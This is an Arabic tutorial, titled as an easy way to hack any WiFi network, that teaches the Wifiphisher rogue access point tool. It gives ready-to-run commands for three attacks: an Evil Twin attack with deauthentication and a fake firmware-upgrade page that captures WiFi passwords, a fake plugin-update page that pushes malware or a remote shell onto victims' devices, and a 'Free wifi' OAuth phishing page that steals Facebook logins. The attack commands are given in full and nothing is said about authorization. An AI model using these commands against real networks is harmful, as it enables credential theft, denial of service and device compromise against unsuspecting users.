الطريقة الجديدة لإختراق أي وايفاي بكل سهولة ,إخترق الأن بالهاتف أو الحاسوب عن طريق 2021Wifiphisher

 

Wifiphisher هو إطار عمل مفتوح المصدر يمكن استخدامه لاختراق الشبكة اللاسلكية لفريق Red Team عبر هجمات man in the middle. يمكن للأداة استخدام تقنيات ارتباط WLAN الحديثة مثل Known Beacons و KARMA و Evil Twin. تقوم Wifiphisher ، وهي تقنية معروفة ، بإرسال ESSIDs المعروفة لضحية. KARMA هي تقنية قناع يتصرف فيها Wifiphisher مثل شبكة عامة. Evil Twin هي التقنية الأكثر شيوعًا المستخدمة لإنشاء نقاط إتصال وهمية. بالإضافة إلى ذلك ، تستخدم أيضًا هذه الأداة هجمات التصيد (phishing) لسرقة بيانات حساب التواصل الاجتماعي مثل الفيسبوك .

تثبيت Wifiphisher

يتطلب Wifiphisher محول شبكة لاسلكية يجب أن يضخ الحزم ويدعم وضع المراقبة. Wifiphisher متوافق مع نظام التشغيل Linux مع Kali Linux كتوزيع مدعوم رسميًا. يمكن إجراء التثبيت عن طريق استنساخ أداة Github بالأمر التالي:

git clone 
https://github.com/wifiphisher/wifiphisher.git

بعد استنساخ الأداة ، انتقل إلى مسار Wifiphisher وقم بتشغيل ملف التثبيت باستخدام الأمر التالي.

cd wifiphisher
sudo python setup.py install

 

كيف يعمل Wifiphisher

يمكن بدء Wifiphisher مع أو بدون معلمات أو خيارات. لتشغيل الأداة بدون ضبط الخيارات ، ما عليك سوى كتابة wifiphisher أو python bin / wifiphisher في الجهاز. تبحث الأداة عن واجهة WLAN المناسبة وتفتح في وضع GUI ، كما هو موضح في لقطة الشاشة التالية.

بعد فتح واجهة المستخدم الرسومية ، تبحث الأداة عن شبكات wifi المتاحة (ESSID) في المنطقة المحيطة. يمكن تحديد ESSID الهدف من خلال مفاتيح الأسهم لأعلى / لأسفل.

كما ذكرنا سابقًا ، فإن الأداة قادرة على تنفيذ جميع هجمات MITM WiFi الحديثة. KARMA و Evil Twin هي أوضاع الهجوم الافتراضية لـ Wifiphisher. يمكن تنفيذ هجوم Evil Twin عن طريق تشغيل الأداة بخيارات الأوامر التالية.

wifiphisher -aI wlan0 -jI wlan1 -p 
firmware-upgrade --handshake-capture handshake.pcap

يستخدم الأمر أعلاه واجهة wlan0 كنقطة وصول غير مرغوب فيها يمكن للضحايا الاتصال من خلالها. يتم استخدام شبكة wlan1 بعلامة –jI لشن هجوم DoS (رفض الخدمة). يمنع هجوم DoS المستخدمين من الاتصال بنقطة الوصول الحقيقية. يُطلب من المستخدمين إدخال كلمة مرور WiFi للاتصال وتحديث البرنامج الثابت (وهمي).

لا يقتصر Wifiphisher على سرقة بيانات اعتماد WiFi. يمكن استخدامه لإدخال تعليمات برمجية / برامج ضارة في جهاز الضحية .

wifiphisher --essid
Office_Wifi -p plugin_update -pK <Pre-shared Key>

يرسل الأمر أعلاه خيار تحديث الإضافة إلى ESSID المسمى Office_Wifi. مفتاح WiFi (pre-shared key) معروف للمهاجم في هذا الهجوم. 

الضحايا الذين يقومون بمهمة تحديث الإضافة يقومون بالفعل بتنزيل برمجيات ضارة في أجهزتهم. يمكن أن يكون الرمز برنامجًا ضارًا أو شل (shell) يمكنها توفير وصول عن بُعد للمهاجم. وبالمثل ،

 يمكن أيضًا استخدام Wifiphisher لسرقة بيانات اعتماد الشبكة الاجتماعية للمستخدمين.

wifiphisher --noextensions --essid
 "Free wifi" -p oauth-login -kB

يطلب الأمر أعلاه من المستخدمين الاتصال بـ Free wifi ESSID عن طريق إدخال بيانات حساباتهم الاجتماعية مثل FB.